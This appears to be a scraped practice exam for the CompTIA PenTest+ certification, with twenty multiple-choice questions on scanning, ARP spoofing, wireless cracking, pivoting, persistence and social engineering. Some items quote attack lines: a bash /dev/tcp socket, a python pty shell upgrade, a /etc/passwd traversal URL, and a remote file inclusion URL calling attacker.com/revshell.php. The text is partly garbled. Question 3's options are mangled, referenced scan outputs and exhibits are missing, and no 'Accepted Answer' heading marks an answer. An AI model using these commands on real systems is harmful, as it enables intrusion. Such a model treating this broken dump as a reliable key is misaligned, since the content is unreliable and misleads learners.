Question 1

Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?

Accepted Answer

A)  Penetration test findings often contain company intellectual property 
B)  Penetration test findings could lead to consumer dissatisfaction if made public. 
C)  Penetration test findings are legal documents containing privileged information. 
D)  Penetration test findings can assist an attacker in compromising a system.

Question 2

After several attempts, an attacker was able to gain unauthorized access through a biometrics sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?

Accepted Answer

A)  The biometric device is tuned more toward false positives. 
B)  The biometric device is configured more toward true negatives. 
C)  The biometric device is set to fail closed. 
D)  The biometric device duplicated a valid user's fingerprint.

Question 3

A penetration tester is attempting to open a socket in a bash script but receives errors when running it. The current state of the relevant line in the script is as follows:  Which of the following lines of code would correct the issue upon substitution?

Accepted Answer

A) open 0/dev/tcp/${HOST}:${PORT} B) exec 0/dev/tcp/${HOST}/${PORT} E) open 3

Question 4

A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

Accepted Answer

A)  Deauthentication attacks against an access point can allow an opportunity to capture the four-way handshake, which can be used to obtain and crack the encrypted password. 
B)  Injection of customized ARP packets can generate many initialization vectors quickly, making it faster to crack the password, which can then be used to connect to the WPA2-protected access point. 
C)  Weak implementations of the WEP can allow pin numbers to be guessed quickly, which can then be used to retrieve the password, which can then be used to connect to the WEP-protected access point. 
D)  Rainbow tables contain all possible password combinations, which can be used to perform a brute-force password attack to retrieve the password, which can then be used to connect to the WPA2-protected access point.

Question 5

Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Accepted Answer

A)  set rhost 192.168.1.10 
B)  run autoroute -s 192.168.1.0/24 
C)  db_nmap -iL /tmp/privatehosts.txt 
D)  use auxiliary/server/socks4a

Question 6

A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the penetration tester's SSH connection to the testing platform drops:  Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?

Accepted Answer

A)  # sudo ettercap -Tq -w output.cap -M ARP /192.168.1.0/ /192.168.1.255/ 
B)  # proxychains ettercap -Tq -w output.cap -M ARP /192.168.1.13/ /192.168.1.1/ 
C)  # ettercap -Tq -w output.cap -M ARP 00:00:00:00:00:00//80 FF:FF:FF:FF:FF:FF//80 
D)  # ettercap --safe-mode -Tq -w output.cap -M ARP /192.168.1.2-255/ /192.168.1.13/ 
E)  # ettercap -Tq -w output.cap -M ARP /192.168.1.2-12;192.168.1.14-255/ /192.168.1.1/

Question 7

Click the exhibit button.  A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Accepted Answer

A)  SNMP brute forcing 
B)  ARP spoofing 
C)  DNS cache poisoning 
D)  SMTP relay

Question 8

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Accepted Answer

A)  Randomize the credentials used to log in. 
B)  Install host-based intrusion detection. 
C)  Implement input normalization. 
D)  Perform system hardening.

Question 9

Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

Accepted Answer

A)  Lockpicking 
B)  Egress sensor triggering 
C)  Lock bumping 
D)  Lock bypass

Question 10

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?

Accepted Answer

A)  Rules of engagement 
B)  Request for proposal 
C)  Master service agreement 
D)  Business impact analysis

Question 11

A penetration tester ran an Nmap scan against a target and received the following output:  Which of the following commands would be best for the penetration tester to execute NEXT to discover any weaknesses or vulnerabilities?

Accepted Answer

A)  onesixtyone -d 192.168.121.1 
B)  enum4linux -w 192.168.121.1 
C)  snmpwalk -c public 192.168.121.1 
D)  medusa -h 192.168.121.1 -U users.txt -P passwords.txt -M ssh

Question 12

A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Accepted Answer

A)  Advanced persistent threat 
B)  Script kiddie 
C)  Hacktivist 
D)  Organized crime

Question 13

A penetration tester, who is not on the client's network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125 Which of the following commands would be BEST to return results?

Accepted Answer

A)  nmap -Pn -sT 100.100.1.0-125 
B)  nmap -sF -p 100.100.1.0-125 
C)  nmap -sV -oA output 100.100.10-125 
D)  nmap 100.100.1.0-125 -T4

Question 14

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

Accepted Answer

A)  Principle of fear 
B)  Principle of authority 
C)  Principle of scarcity 
D)  Principle of likeness 
E)  Principle of social proof

Question 15

A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?

Accepted Answer

A)  -p- 
B)  -p ALL 
C)  -p 1-65534 
D)  -port 1-65534

Question 16

Given the following: http://example.com/download.php?id-.../.../.../etc/passwd Which of the following BEST describes the above attack?

Accepted Answer

A)  Malicious file upload attack 
B)  Redirect attack 
C)  Directory traversal attack 
D)  Insecure direct object reference attack

Question 17

After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

Accepted Answer

A)  Run a zero-day exploit. 
B)  Create a new domain user with a known password. 
C)  Modify a known boot time service to instantiate a call back. 
D)  Obtain cleartext credentials of the compromised user.

Question 18

A penetration tester runs the following from a compromised 'python -c ' import pty;pty.spawn ("/bin/bash") ' . Which of the following actions are the tester taking?

Accepted Answer

A)  Removing the Bash history 
B)  Upgrading the shell 
C)  Creating a sandbox 
D)  Capturing credentials

Question 19

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

Accepted Answer

A)  Implement a blacklist. 
B)  Block URL redirections. 
C)  Double URL encode the parameters. 
D)  Stop external calls from the application.

Question 20

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

Accepted Answer

A)  MAC address of the client 
B)  MAC address of the domain controller 
C)  MAC address of the web server 
D)  MAC address of the gateway

Exam 12: CompTIA PenTest+ Certification Exam